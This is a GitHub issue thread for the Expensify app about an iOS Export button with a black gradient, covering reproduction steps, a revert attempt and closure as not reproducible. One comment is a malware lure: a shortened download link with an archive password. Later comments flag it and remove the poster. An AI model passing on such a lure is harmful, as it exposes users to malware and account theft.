### ISSUE TITLE
[$250] iOS - Expense - Payment button shows black gradient

### ISSUE THREAD

**Issue by IuliiaHerets** [Expensify/App#48103]
If you haven’t already, check out our [contributing guidelines](https://github.com/Expensify/ReactNativeChat/blob/main/contributingGuides/CONTRIBUTING.md) for onboarding and email contributors@expensify.com to request to join our Slack channel!
___

**Version Number:** 9.0.25-3
**Reproducible in staging?:** Y
**Reproducible in production?:** N
**If this was caught during regression testing, add the test name, ID and link from TestRail:** Exp https://expensify.testrail.io/index.php?/tests/view/4895183
**Email or phone of affected tester (no customers):** applausetester+kh05081@applause.expensifail.com
**Issue reported by:** Applause Internal Team

## Action Performed:
Updated reproduction steps [here](https://github.com/Expensify/App/issues/48103#issuecomment-2326073178) and listed below:

1. Launch New Expensify app.
2. Create a workspace.
3. Connect it to QBO. 
4. Disable auto-sync. 
5. submit a report and pay it. 
6. Navigate to export button. 

## Expected Result:
Export button will not have black gradient.

## Actual Result:
Export button shows black gradient.

## Workaround:
Unknown

## Platforms:

- [ ] Android: Native
- [ ] Android: mWeb Chrome
- [x] iOS: Native
- [ ] iOS: mWeb Safari
- [ ] MacOS: Chrome / Safari
- [ ] MacOS: Desktop

## Screenshots/Videos
![Bug6584280_1724773991771!IMG_4669](https://github.com/user-attachments/assets/ea132ae0-dd56-43d8-83fd-54e27df0eb26)

https://github.com/user-attachments/assets/318ab224-279b-422c-b5aa-1987a0728071

</details>

[View all open jobs on GitHub](https://github.com/Expensify/App/issues?q=is%3Aopen+is%3Aissue+label%3A%22Help+Wanted%22)

<details><summary>Upwork Automation - Do Not Edit</summary>
    <ul>
        <li>Upwork Job URL: https://www.upwork.com/jobs/~01c3743ad146431654</li>
        <li>Upwork Job ID: 1828483486548366437</li>
        <li>Last Price Increase: 2024-09-10</li>
    </ul>
</details>

<details><summary>Issue Owner</summary>Current Issue Owner: @dukenv0307</details>

**Comment by IuliiaHerets** [comment]
We think that this bug might be related to #wave-collect - Release 1

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by caineblood** [comment]
The above comment asking you to download a file is malware to steal your account; do not under any circumstances download or run it. The post needs to be removed. If you have attempted to run it please have your system cleaned and your account secured immediately.

**Comment by joekaufmanexpensify** [comment]
@caineblood Thanks for flagging! We have removed that user from being able to interact with GH issues.

**Comment by bondydaa** [comment]
@allroundexperts could you take a look here, we thought maybe it's related to this https://github.com/Expensify/App/pull/37174

we're having issues with some of our iOS sims locally so can you see if 1. you can reproduce on `main` and if so if 2. this revert fixes it? https://github.com/Expensify/App/pull/48117

**Comment by bondydaa** [comment]
oh I wonder if this is specific to dark mode? looking at the screenshots/video from https://github.com/Expensify/App/pull/37174#issuecomment-2309013800 thats in light mode 🤷

**Comment by bondydaa** [comment]
@IuliiaHerets can you re-test with light mode on and share the screenshots/videos?

**Comment by IuliiaHerets** [comment]
@bondydaa Done, issue also repro with a light mode, build v9.0.25-8
![IMG_4689](https://github.com/user-attachments/assets/1700e2c5-9fb9-44e9-b25f-9fe8f940357c)

https://github.com/user-attachments/assets/0ed04ca2-80c3-48d5-99b5-bf5f84d79a3a

**Comment by yuwenmemon** [comment]
Okay testing with the adhoc build in https://github.com/Expensify/App/pull/48117, the gradient does indeed go away:

| Screenshot 1 | Screenshot 2 |
|--------------|--------------|
| ![IMG_5447](https://github.com/user-attachments/assets/ce014e8b-6f26-4d33-a03f-751c4f099d04) | ![IMG_5449](https://github.com/user-attachments/assets/bcc33369-369d-43e8-8c0e-524a44c544c6) |


Sorry folks, but it looks like we may need to revert, unless @IuliiaHerets or @brandonhenry want to take a stab at fixing it quick?

**Comment by yuwenmemon** [comment]
This has been deployed and is now fixed on staging.

**Comment by lanitochka17** [comment]
Issue is still reproducible

https://github.com/user-attachments/assets/a2d52caa-08ab-4eaf-91a0-afbc0f2f7cc7

**Comment by bondydaa** [comment]
We're going to revert this revert PR since that didn't seem to actually fix this problem https://github.com/Expensify/App/pull/48117

I wonder if this is something related to the react native bump we had and a default style was updated?

I think we take this off of `reviewing` and see what contributors can figure out to fix this, though it seems it's hard to reproduce locally 🤷

**Comment by bondydaa** [comment]
curious @lanitochka17 is this only showing on Staging still? Or does it appear on production now?

I would assume it would be showing up on production by now if https://github.com/Expensify/App/pull/48117 wasn't the cause since we've done fully deploys since the revert anyways.

I wonder if this is something strange just happening on staging?

**Comment by IuliiaHerets** [comment]
@bondydaa Issue happens when the button has a dropdown. It requires different repro steps now. You can connect to QBO and disable Auto sync then it can repro with the Export button with dropdown. Stg and prod - the same.
![IMG_7FC5080A4C91-1 (1)](https://github.com/user-attachments/assets/8658bf26-fcd1-4c5e-9c2f-49d2abf1b760)

https://github.com/user-attachments/assets/a6915c4f-b2b6-4afc-a5fa-a1fcb068c5f0

**Comment by bondydaa** [comment]
Ah thank you!

**Comment by joekaufmanexpensify** [comment]
Still waiting for proposals. Updated reproduction steps and posted in slack [here](https://expensify.slack.com/archives/C01GTK53T8Q/p1725889422324549)!

**Comment by joekaufmanexpensify** [comment]
Got it. @IuliiaHerets are you still able to reproduce this?

**Comment by yuwenmemon** [comment]
Yeah I have not seen this ever either - I think we can close until we see this happening confirmed on more than one device

**Comment by yuwenmemon** [comment]
I was not able to reproduce this time.

**Comment by joekaufmanexpensify** [comment]
Same, I can't reproduce either. Closing for now as this doesn't appear to be consistently reproducible any longer.
